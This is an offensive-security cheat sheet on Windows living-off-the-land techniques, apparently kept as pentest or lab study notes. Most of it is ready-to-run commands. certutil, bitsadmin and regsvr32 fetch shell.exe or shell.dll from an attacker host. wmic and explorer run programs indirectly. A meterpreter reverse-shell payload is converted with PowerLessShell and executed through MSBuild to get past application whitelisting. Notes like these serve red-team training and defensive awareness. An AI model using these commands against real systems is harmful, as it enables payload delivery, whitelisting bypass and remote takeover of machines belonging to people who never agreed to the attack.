killchain-compendium/Post Exploitation/Windows/Living off the Land.md

# LOLBINS

* [LOLBAS](https://lolbas-project.github.io/)
    * All binaries are signed by Microsoft
    * Shows paths to the binary

## Ingress Tool Transfer

[certutil.exe](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil), may be used for payload downloads and encoding

```sh
certutil.exe -urlcache -split -f http://%ATTACKER_IP%/shell.exe C:\Windows\Temp\noshell.exe
certutil.exe -encode shell.exe encoded-shell.txt
```

* [bitsadmin](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bitsadmin)

```sh
bitsadmin.exe /transfer /download /priority foreground http://%ATTACKER_IP%/shell.exe C:\Windows\Temp\noshell.exe
```

* findstr

```sh
findstr /v dummystring  \\Path\to\shell.exe > C:\Windows\Temp\noshell.exe
```

## Indirect Command Execution

Explorer as parent process to execute other PEs

```sh
explorer /root, "C:\Windows\System32\cmd.exe"
```

Windows management instrumentation

```sh
wmic.exe process call create calc
```

* `rundll32.exe`

## Bypass Whiteslists

* `regsvr32.exe` can execute PEs in memory, even remotely
* DLL has to match architecture

```sh
C:\Windows\System32\regsvr32.exe C:\Temp\shell.dll
C:\Windows\System32\regsvr32.exe /s /n /u /i:http://%ATTACKER_IP%/shell.dll shell.dll
```

* `bash.exe -c calc.exe`

## Shortcut Modification Technique

* Execute PEs via shortcuts
* Clone [powerlessshell](https://github.com/Mr-Un1k0d3r/PowerLessShell.git)
* `msfvenom` with `windows/meterpreter/reverse_winhttps`
* Set `multi/handler` with `set payload windows/meterpreter/reverse_winhttps`
* Transform to `*.csproj` 

```sh
python2 PowerLessShell.py -type powershell -source /tmp/shell.ps1 -output shell.csproj
```

* Execute on target

```sh
c:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe c:\Users\thm\Desktop\shell.csproj
```